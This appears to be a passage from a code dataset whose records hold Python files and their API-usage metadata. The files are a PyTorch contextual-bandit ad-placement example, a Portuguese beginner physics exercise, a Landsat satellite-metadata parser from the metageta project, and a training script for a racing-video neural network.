69, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 78, 
"usage_type": "call"}, {"api_name": "requests.get", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "requests.ConnectionError", "line_number": 91, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 97, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 98, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 105, "usage_type": "call"}, {"api_name": "re.search", "line_number": 109, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 111, "usage_type": "call"}, {"api_name": "re.search", "line_number": 112, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 114, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 121, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 133, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 139, "usage_type": "call"}, {"api_name": "re.search", "line_number": 141, "usage_type": "call"}, {"api_name": "re.search", "line_number": 142, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 150, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 152, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 194, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 195, "usage_type": "call"}, {"api_name": "time.time", "line_number": 196, "usage_type": "call"}, {"api_name": "time.time", "line_number": 199, "usage_type": "call"}]} +{"seq_id": "23011001135", "text": "\"\"\"\nThe following example demonstrates how to solve the\ncontext-bandit problem. The example is taken from the book\nDeep Reinforcement Learning in Action by Manning.\nThe book GitHub repository is at https://github.com/DeepReinforcementLearning/DeepReinforcementLearningInAction\n\nThe n-armed bandit problem has an n-element action space meaning the space or set of all possible actions.\nHowever, there is no concept of state.\nThis means that there is no information in the environment that would help us choose a good arm.\nThe only way we could figure out which arms were good is by trial and error.\n\nIn the ad problem, we know the user is buying something on a particular site, which may give\nus some information about that user’s preferences and could help guide our\ndecision about which ad to place. 
We call this contextual information\nstate and this new class of problems contextual bandits\n\nThis example is using PyTorch to build a neural network that represents the state-action value function.\nIn particular, we are going to build a two-layer feedforward neural\nnetwork that uses rectified linear units (ReLU) as the activation function.\nThe first layer accepts a 10-element one-hot encoded vector of the state,\nand the final layer returns a 10-element\nvector representing the predicted reward for each action given the state.\n\n\"\"\"\n\nimport numpy as np\nimport random\nimport torch\nimport matplotlib.pyplot as plt\n\nfrom src.utils.array_utils import build_one_hot_encoding\nfrom src.policies.softmax_policy import SoftMaxPolicy\nfrom src.utils import INFO\n\nN_ACTIONS = 10\nTAU = 2.0\n\ndef running_mean(x, N=50):\n \"\"\"\n Helper function for plotting running mean\n :param x:\n :param N:\n :return:\n \"\"\"\n c = x.shape[0] - N\n y = np.zeros(c)\n conv = np.ones(N)\n for i in range(c):\n y[i] = (x[i:i+N] @ conv)/N\n return y\n\n\nclass ContextBandit:\n \"\"\"\n The class that represents the environment\n \"\"\"\n def __init__(self, arms=10):\n self.arms = arms\n self.bandit_matrix = None\n self.state = None\n self.init_distribution(arms)\n self.update_state()\n\n def step(self, arm):\n reward = self.get_reward(arm)\n self.update_state()\n return reward\n\n def init_distribution(self, arms: int):\n self.bandit_matrix = np.random.rand(arms, arms)\n\n def reward(self, prob: float):\n reward = 0\n for i in range(self.arms):\n if random.random() < prob:\n reward += 1\n return reward\n\n def get_state(self):\n \"\"\"\n Returns a state sampled randomly from a uniform distribution.\n See the update_state function\n :return:\n \"\"\"\n return self.state\n\n def update_state(self):\n self.state = np.random.randint(0, self.arms)\n\n def get_reward(self, arm):\n return self.reward(self.bandit_matrix[self.get_state()][arm])\n\n\ndef train(env, network, epochs=5000, learning_rate=1e-2):\n \"\"\"\n Main training function.\n\n We initialize the current state randomly and transform into a one-hot-encoded tensor.\n In the training loop, we evaluate the model\n Once we enter the main training for loop, we’ll run our neural network model with the randomly\n initialized current state vector. It will return a vector that represents its\n guess for the values of each of the possible actions.\n\n At first, the model will output a bunch of random values since it is not trained.\n We’ll run the softmax function over the model’s output to generate a probability\n distribution over the actions. We’ll then select an action using the\n environment’s step(...) function, which will return the reward\n generated for taking that action; it will also update the environment’s current state.\n\n We turn the reward (which is a non-negative integer) into a one-hot vector that\n can be used as the training data. After that we run one step of backpropagation using this reward vector,\n for the state we gave the model. 
Since we’re using a neural network model as our\n action-value function, we no longer have any sort of action-value array storing “memories;”\n everything is being encoded in the neural network’s weight parameters.\n \n \"\"\"\n cur_state = torch.Tensor(build_one_hot_encoding(n=arms, pos=env.get_state()))\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n rewards = []\n softmax = SoftMaxPolicy(n_actions=N_ACTIONS, tau=TAU)\n\n for i in range(epochs):\n\n # get the predictions from the model\n y_pred = network(cur_state)\n\n # make a choice\n av_softmax = softmax.softmax_values(y_pred.data.numpy())\n av_softmax /= av_softmax.sum()\n choice = np.random.choice(arms, p=av_softmax)\n\n # step in the environment\n cur_reward = env.step(choice)\n\n one_hot_reward = y_pred.data.numpy().copy()\n one_hot_reward[choice] = cur_reward\n reward = torch.Tensor(one_hot_reward)\n rewards.append(cur_reward)\n loss = loss_fn(y_pred, reward)\n\n print(\"{0} On Episode={1} Loss={2}\".format(INFO, i, torch.mean((y_pred - reward)**2)))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n cur_state = torch.Tensor(build_one_hot_encoding(arms, env.get_state()))\n return np.array(rewards)\n\n\nif __name__ == '__main__':\n\n arms = 10\n N, D_in, H, D_out = 1, arms, 100, arms\n\n # create a PyTorch model\n model = torch.nn.Sequential(\n torch.nn.Linear(D_in, H),\n torch.nn.ReLU(),\n torch.nn.Linear(H, D_out),\n torch.nn.ReLU(),\n )\n\n # loss function\n loss_fn = torch.nn.MSELoss()\n\n # set up the environment\n env = ContextBandit(arms)\n\n # train the model\n rewards = train(env=env, network=model)\n\n plt.plot(running_mean(rewards, N=500))\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Reward\")\n plt.show()\n", "repo_name": "pockerman/py_cube_ai", "sub_path": "src/examples/pytorch_examples/advertisement_placement.py", "file_name": "advertisement_placement.py", "file_ext": "py", "file_size_in_byte": 5922, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 70, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 117, "usage_type": "call"}, {"api_name": "src.utils.array_utils.build_one_hot_encoding", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 118, "usage_type": "attribute"}, {"api_name": "src.policies.softmax_policy.SoftMaxPolicy", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 130, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 137, "usage_type": "call"}, {"api_name": "src.utils.INFO", "line_number": 141, "usage_type": "argument"}, {"api_name": "torch.mean", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 145, "usage_type": "call"}, {"api_name": "src.utils.array_utils.build_one_hot_encoding", "line_number": 145, "usage_type": "call"}, 
{"api_name": "numpy.array", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 157, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 158, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 159, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}]} +{"seq_id": "17439954586", "text": "# Aula 9 Exercicio 2 apostila\n# Queremos obter uma tabela ou gráfico da distância percorrida en função do tempo e o tempo total para chegar em 7 km, faça isto utilizando listas.\nprint('Lista de distâncias percorridas por uma corredora a cada 1min')\ncam = 5\nvel = 12\n\ndef min_hora(minu):\n h = minu / 60\n return(h)\n\ndef dist_cons(t, v):\n dmin = v * t\n return(dmin)\n\ndist2 = 0.2\nvel2 = 15\ndef dist_var(t,v0,v):\n dvar = (t/2)*(v-v0)\n return(dvar)\n\ndist_list = []\ndm = 0\ndist_list.append(0)\n\nwhile dm <= 7:\n\tif dm <=5:\n \tdm = dist_cons(min_hora(1), vel) + dm\n \tdist_list.append(dm)\n\n\telif dm > 5 and dm < 5.2:\n\t\tdm = dist_var(min_hora(1),vel,vel2) + dm\n\t\tdist_list.append(dm)\n\n\telse:\n\t\tdm = dist_cons(min_hora(1), vel2) + dm\n\t\tdist_list.append(dm)\n\ntime_list = []\nt = len(dist_list)\ntm = 0\nfor i in range(t):\n tm = tm + 1\n time_list.append(tm)\n\ns = len(dist_list)\nfor i in range(s):\n print(\"%.2f\" % dist_list[i]) #\"%.2f\" % reduz para duas casas decimais de incerteza.\n\nimport matplotlib.pyplot as plt\n\nplt.plot(time_list,dist_list)\nplt.xlabel(\"tempo min\")\nplt.ylabel(\"distância km\")\nplt.show()\nplt.close()\n\nprint('Fim!')\n\n", "repo_name": "jvictor42/PyUERJ-first-steps", "sub_path": "Exercicios apostila e exemplos/Aula9.2A.py", "file_name": "Aula9.2A.py", "file_ext": "py", "file_size_in_byte": 1165, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 53, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "38314774282", "text": "# -*- coding: utf-8 -*-\r\n# Copyright (c) 2015 Australian Government, Department of the Environment\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in\r\n# all copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\r\n# THE SOFTWARE.\r\n\r\n'''\r\nMetadata driver for Landsat geotiff imagery\r\n\r\nB{General info}:\r\n - U{http://www.ga.gov.au/remote-sensing/satellites-sensors/landsat}\r\n'''\r\n\r\nformat_regex=[r'L.*\\_MTL\\.txt$']# - Standard file names\r\n'''Regular expression list of file formats'''\r\n\r\n#import base dataset module\r\nimport __default__\r\n\r\n# import other modules (use \"_\" prefix to import privately)\r\nimport sys, os, re, glob, time, math, string\r\nfrom metageta import utilities, geometry, spatialreferences\r\n\r\ntry:\r\n from collections import OrderedDict\r\nexcept:\r\n from metageta.ordereddict import OrderedDict\r\n\r\ntry:\r\n from osgeo import gdal\r\n from osgeo import gdalconst\r\n from osgeo import osr\r\n from osgeo import ogr\r\nexcept ImportError:\r\n import gdal\r\n import gdalconst\r\n import osr\r\n import ogr\r\ngdal.AllRegister()\r\n\r\nclass Dataset(__default__.Dataset):\r\n '''Subclass of __default__.Dataset class so we get a load of metadata populated automatically'''\r\n def __init__(self,f):\r\n if f[:4]=='/vsi':raise NotImplementedError\r\n self.filelist = glob.glob(os.path.dirname(f)+'/*')\r\n def __getmetadata__(self):\r\n '''Read Metadata for a Landsat Geotiff with Level 1 Metadata format image as GDAL doesn't get it all.'''\r\n f=self.fileinfo['filepath']\r\n d=os.path.dirname(f)\r\n hdr=parseheader(f)\r\n\r\n if hdr['L1_METADATA_FILE'].get('LANDSAT_SCENE_ID'):self.__getnewmetadata__(f,d,hdr)\r\n else:self.__getoldmetadata__(f,d,hdr)\r\n\r\n md=self.metadata\r\n vrtxml=geometry.CreateSimpleVRT(self.bandfiles,md['cols'],md['rows'], md['datatype'])\r\n self._gdaldataset = geometry.OpenDataset(vrtxml)\r\n for i in range(self._gdaldataset.RasterCount):\r\n self._gdaldataset.GetRasterBand(i+1).SetNoDataValue(0)\r\n\r\n #Fix quicklook stretch for Landsat 8 data\r\n if md['satellite']=='LANDSAT_8':\r\n self._stretch=['PERCENT',[4,3,2],[1,99]]\r\n else:\r\n 
self._stretch=['PERCENT',[3,2,1], [2,98]]\r\n\r\n def __getnewmetadata__(self,f,d,hdr):\r\n '''Read Metadata for a Landsat Geotiff with new (>2012) Level 1 Metadata.'''\r\n\r\n #bands=[''.join(fnb.split('_')[3:]).replace('VCID','') for fnb in sorted(hdr['PRODUCT_METADATA'].keys()) if fnb.startswith('FILE_NAME_BAND')]\r\n #self.bandfiles=[os.path.join(d,hdr['PRODUCT_METADATA'][fnb]) for fnb in sorted(hdr['PRODUCT_METADATA'].keys()) if fnb.startswith('FILE_NAME_BAND')]\r\n bands=[''.join(fnb.split('_')[3:]).replace('VCID','') for fnb in hdr['PRODUCT_METADATA'].keys() if fnb.startswith('FILE_NAME_BAND')]\r\n self.bandfiles=[os.path.join(d,hdr['PRODUCT_METADATA'][fnb]) for fnb in hdr['PRODUCT_METADATA'].keys() if fnb.startswith('FILE_NAME_BAND')]\r\n\r\n __default__.Dataset.__getmetadata__(self, self.bandfiles[0])\r\n\r\n md=self.metadata\r\n md['metadata']=open(f).read().replace('\\x00','')\r\n md['sceneid']=hdr['L1_METADATA_FILE']['LANDSAT_SCENE_ID']\r\n md['filetype'] = 'GTIFF/Landsat MTL Geotiff'\r\n\r\n md['bands']=','.join(bands)\r\n md['nbands']=len(bands)\r\n md['level']=hdr['PRODUCT_METADATA']['DATA_TYPE']\r\n md['imgdate']='%sT%s'%(hdr['PRODUCT_METADATA']['DATE_ACQUIRED'],hdr['PRODUCT_METADATA']['SCENE_CENTER_TIME'][0:8]) #ISO 8601 format, strip off the milliseconds\r\n md['satellite']=hdr['PRODUCT_METADATA']['SPACECRAFT_ID']\r\n md['sensor']=hdr['PRODUCT_METADATA']['SENSOR_ID']\r\n md['demcorrection']=hdr['PRODUCT_METADATA'].get('ELEVATION_SOURCE','') #Level 1G isn't terrain corrected\r\n md['resampling']=hdr['PROJECTION_PARAMETERS']['RESAMPLING_OPTION']\r\n md['sunazimuth']=hdr['IMAGE_ATTRIBUTES']['SUN_AZIMUTH']\r\n md['sunelevation']=hdr['IMAGE_ATTRIBUTES']['SUN_ELEVATION']\r\n md['cloudcover']=hdr['IMAGE_ATTRIBUTES']['CLOUD_COVER']\r\n\r\n def __getoldmetadata__(self,f,d,hdr):\r\n '''Read Metadata for a Landsat Geotiff with ol (pre 2012) Level 1 Metadata.'''\r\n\r\n bands=sorted([i for i in hdr['PRODUCT_METADATA']['BAND_COMBINATION']])\r\n if hdr['PRODUCT_METADATA']['SENSOR_ID']=='ETM+': #Landsat 7 has 2 data files for thermal band 6\r\n #Format=123456678\r\n bands[5]=bands[5].replace('6','61')\r\n bands[6]=bands[6].replace('6','62')\r\n\r\n self.bandfiles=[os.path.join(d,hdr['PRODUCT_METADATA']['BAND%s_FILE_NAME'%b]) for b in bands]\r\n\r\n __default__.Dataset.__getmetadata__(self, self.bandfiles[0])\r\n\r\n md=self.metadata\r\n md['metadata']=open(f).read().replace('\\x00','')\r\n md['sceneid']=os.path.basename(d)\r\n md['filetype'] = 'GTIFF/Landsat MTL Geotiff'\r\n\r\n md['bands']=','.join(bands)\r\n md['nbands']=len(bands)\r\n md['level']=hdr['PRODUCT_METADATA']['PRODUCT_TYPE']\r\n md['imgdate']='%sT%s'%(hdr['PRODUCT_METADATA']['ACQUISITION_DATE'],hdr['PRODUCT_METADATA']['SCENE_CENTER_SCAN_TIME'][0:8]) #ISO 8601 format, strip off the milliseconds\r\n md['satellite']=hdr['PRODUCT_METADATA']['SPACECRAFT_ID']\r\n md['sensor']=hdr['PRODUCT_METADATA']['SENSOR_ID']\r\n md['demcorrection']=hdr['PRODUCT_METADATA'].get('ELEVATION_SOURCE','') #Level 1G isn't terrain corrected\r\n md['resampling']=hdr['PROJECTION_PARAMETERS']['RESAMPLING_OPTION']\r\n md['sunazimuth']=hdr['PRODUCT_PARAMETERS']['SUN_AZIMUTH']\r\n md['sunelevation']=hdr['PRODUCT_PARAMETERS']['SUN_ELEVATION']\r\n\r\ndef parseheader(f):\r\n ''' A simple header parser.\r\n\r\n @type f: C{str}\r\n @param f: Path to header file\r\n @rtype: C{dict}\r\n @return: Dictionary\r\n\r\n @todo:This function works for both landsat MTL and Digitalglobe IMD metadata\r\n files. 
Need to fix duplication - digitalglobe driver will need tweaking\r\n as it's version of the parser extracts band information.\r\n '''\r\n\r\n if f[:4]=='/vsi':\r\n lines=iter(geometry.read_vsi(f).splitlines())\r\n else:\r\n lines=iter(open(f).readlines())\r\n\r\n hdrdata=OrderedDict({})\r\n line=lines.next()\r\n while line:\r\n line=[item.strip() for item in line.replace('\"','').split('=')]\r\n group=line[0].upper()\r\n if group in ['END;','END']:break\r\n value=line[1]\r\n if group in ['END_GROUP']:pass\r\n elif group in ['BEGIN_GROUP','GROUP']:\r\n group=value\r\n subdata=OrderedDict({})\r\n while line:\r\n line=lines.next()\r\n line = [l.replace('\"','').strip() for l in line.split('=')]\r\n subgroup=line[0]\r\n subvalue=line[1]\r\n if subgroup == 'END_GROUP':\r\n break\r\n elif line[1] == '(':\r\n while line:\r\n line=lines.next()\r\n line = line.replace('\"','').strip()\r\n subvalue+=line\r\n if line[-1:]==';':\r\n subvalue=eval(subvalue.strip(';'))\r\n break\r\n else:subvalue=subvalue.strip(';')\r\n subdata[subgroup]=subvalue\r\n hdrdata[group]=subdata\r\n else: hdrdata[group]=value.strip(');')\r\n line=lines.next()\r\n return hdrdata\r\n\r\n\r\n", "repo_name": "lpinner/metageta", "sub_path": "metageta/formats/landsat_mtl.py", "file_name": "landsat_mtl.py", "file_ext": "py", "file_size_in_byte": 8408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "gdal.AllRegister", "line_number": 54, "usage_type": "call"}, {"api_name": "__default__.Dataset", "line_number": 56, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "metageta.geometry.CreateSimpleVRT", "line_number": 71, "usage_type": "call"}, {"api_name": "metageta.geometry", "line_number": 71, "usage_type": "name"}, {"api_name": "metageta.geometry.OpenDataset", "line_number": 72, "usage_type": "call"}, {"api_name": "metageta.geometry", "line_number": 72, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "__default__.Dataset.__getmetadata__", "line_number": 90, "usage_type": "call"}, {"api_name": "__default__.Dataset", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "__default__.Dataset.__getmetadata__", "line_number": 120, "usage_type": "call"}, {"api_name": "__default__.Dataset", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "metageta.geometry.read_vsi", "line_number": 152, "usage_type": "call"}, {"api_name": "metageta.geometry", "line_number": 152, "usage_type": "name"}, {"api_name": "metageta.ordereddict.OrderedDict", "line_number": 156, "usage_type": "call"}, {"api_name": "metageta.ordereddict.OrderedDict", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "31348158374", "text": "import time\nimport torch\nimport torch.nn as nn\nimport os\nimport csv\nfrom tqdm 
import tqdm\nfrom model import RacingNet\nfrom data import get_loaders\nfrom eval import calculate_speed_error, calculate_accuracy\n\nEXPERIMENT_NAME = \"test-run-2\"\nNUM_ITERS = int(1e4)\nEVAL_ITERS = 100\nCSV_FILE_PATH = 'data/dataset.csv'\nFRAMES_DIR = 'dataset/frames'\nBATCH_SIZE = 32\nEVAL_BATCHES = 10\nFREEZE_BACKBONE = True\nDECAY = 1 - 1.0 / 64\nLEARNING_RATE = 1e-4\n\nif os.path.exists(f'experiments/{EXPERIMENT_NAME}'):\n print(\"Please choose a new experiment name. This one already exists.\")\n exit()\n\n\ndef evaluate_model(model, val_loader, device):\n start = time.time()\n model.eval()\n batch_count = 0\n eval_size = 0\n total_loss = 0\n total_speed_error = 0\n total_gear_accuracy = 0\n total_samples = 0\n\n with torch.no_grad():\n for batch in val_loader:\n images, in_race, true_speed, true_position, true_lap, true_gear = batch\n images, in_race, true_speed, true_position, true_lap, true_gear = \\\n images.to(device), in_race.to(device), true_speed.to(device), \\\n true_position.to(device), true_lap.to(device), true_gear.to(device)\n\n pred_in_race, pred_speed, pred_position, pred_gear, pred_lap = model(images)\n\n # Calculate loss and metrics\n speed_loss = nn.MSELoss()(pred_speed.squeeze(), true_speed.float())\n gear_loss = nn.CrossEntropyLoss()(pred_gear, true_gear.long())\n total_loss = 10 * speed_loss + gear_loss\n speed_error = calculate_speed_error(pred_speed, true_speed)\n gear_accuracy = calculate_accuracy(pred_gear, true_gear)\n\n # Accumulate metrics\n total_loss += total_loss.item()\n total_speed_error += speed_error.item()\n total_gear_accuracy += gear_accuracy\n total_samples += images.shape[0]\n\n batch_count += 1\n eval_size += images.shape[0]\n if batch_count == EVAL_BATCHES:\n break\n\n # Return the average loss and metrics\n return total_loss / total_samples, total_speed_error / total_samples, total_gear_accuracy / total_samples, time.time() - start, eval_size\n\n\ndef train_model(model, optimizer, train_loader, val_loader, device):\n model.train()\n experiment_dir = f'experiments/{EXPERIMENT_NAME}'\n os.makedirs(experiment_dir, exist_ok=True)\n\n # Add this line to keep track of the lowest validation loss\n lowest_val_loss = float('inf')\n\n with open(os.path.join(experiment_dir, 'training_logs.csv'), 'w', newline='') as csvfile:\n csv_writer = csv.writer(csvfile)\n # Add Timestamp and Batch Size in the header\n csv_writer.writerow(\n ['Iteration', 'Phase', 'Mean Loss', 'Speed Error', 'Gear Accuracy', 'Timestamp', 'Batch Size'])\n\n progress_bar = tqdm(total=NUM_ITERS, desc='Training')\n\n mean_loss = 0.0\n iter_count = 0\n mean_speed_loss = 0.0\n mean_gear_loss = 0.0\n mean_speed_error = 0.0\n mean_gear_accuracy = 0.0\n\n while iter_count < NUM_ITERS:\n for i, batch in enumerate(train_loader):\n images, in_race, true_speed, true_position, true_lap, true_gear = batch\n images, in_race, true_speed, true_position, true_lap, true_gear = \\\n images.to(device), in_race.to(device), true_speed.to(device), \\\n true_position.to(device), true_lap.to(device), true_gear.to(device)\n\n optimizer.zero_grad()\n\n pred_in_race, pred_speed, pred_position, pred_gear, pred_lap = model(images)\n\n # Calculate loss\n speed_loss = 5 * nn.MSELoss()(pred_speed.squeeze(), true_speed.float())\n gear_loss = nn.CrossEntropyLoss()(pred_gear, true_gear.long())\n total_loss = speed_loss + gear_loss\n speed_error = calculate_speed_error(pred_speed, true_speed).item()\n gear_accuracy = calculate_accuracy(pred_gear, true_gear)\n\n total_loss.backward()\n optimizer.step()\n\n # Update 
the exponential moving averages\n mean_loss = total_loss.item() if iter_count == 0 else (1 - DECAY) * total_loss.item() + DECAY * mean_loss\n mean_speed_loss = speed_loss if iter_count == 0 else (1 - DECAY) * speed_loss + DECAY * mean_speed_loss\n mean_gear_loss = gear_loss if iter_count == 0 else (1 - DECAY) * gear_loss + DECAY * mean_gear_loss\n mean_speed_error = speed_error if iter_count == 0 else (1 - DECAY) * speed_error + DECAY * mean_speed_error\n mean_gear_accuracy = gear_accuracy if iter_count == 0 else (1 - DECAY) * gear_accuracy + DECAY * mean_gear_accuracy\n\n progress_bar.set_postfix({\n 'loss': f'{mean_loss:.3f}',\n 'loss_speed': f'{mean_speed_loss:.3f}',\n 'loss_gear': f'{mean_gear_loss:.3f}',\n 'speed_err': f'{mean_speed_error:.2f}mph',\n 'gear_acc': f'{mean_gear_accuracy:.2%}',\n # 'eval_time': f'{eval_duration:.2f}s',\n # 'eval_size': f'{eval_size:.0f}'\n })\n progress_bar.update()\n\n # Write training metrics to CSV file with timestamp and batch size\n csv_writer.writerow([iter_count, 'training', total_loss.item(), speed_error, gear_accuracy,\n time.strftime('%Y-%m-%d %H:%M:%S'), images.shape[0]])\n iter_count += 1\n\n if iter_count % EVAL_ITERS == 0:\n # Evaluate on the validation set\n avg_val_loss, avg_val_speed_error, avg_val_gear_accuracy, eval_duration, eval_size = evaluate_model(\n model, val_loader, device)\n\n # Write validation metrics to CSV file with timestamp and batch size\n csv_writer.writerow(\n [iter_count, 'validation', avg_val_loss.item(), avg_val_speed_error, avg_val_gear_accuracy,\n time.strftime('%Y-%m-%d %H:%M:%S'), eval_size])\n\n # Save the model if the validation loss improves\n if avg_val_loss.item() < lowest_val_loss:\n lowest_val_loss = avg_val_loss.item()\n torch.save(model.state_dict(), os.path.join(experiment_dir, 'best_model.pth'))\n\n if iter_count >= NUM_ITERS:\n break\n\n # Save the last model\n torch.save(model.state_dict(), os.path.join(experiment_dir, 'last_model.pth'))\n progress_bar.close()\n\n\ndef main():\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n loaders = get_loaders(CSV_FILE_PATH, FRAMES_DIR, BATCH_SIZE)\n train_loader = loaders.get('train')\n val_loader = loaders.get('valid')\n\n model = RacingNet(freeze_backbone=FREEZE_BACKBONE).to(device)\n optimizer = torch.optim.AdamW(model.parameters(), lr=LEARNING_RATE)\n train_model(model, optimizer, train_loader, val_loader, device)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "furkanhaney/racing-net", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 7207, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "model.eval", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "eval.calculate_speed_error", "line_number": 50, "usage_type": "call"}, {"api_name": "eval.calculate_accuracy", 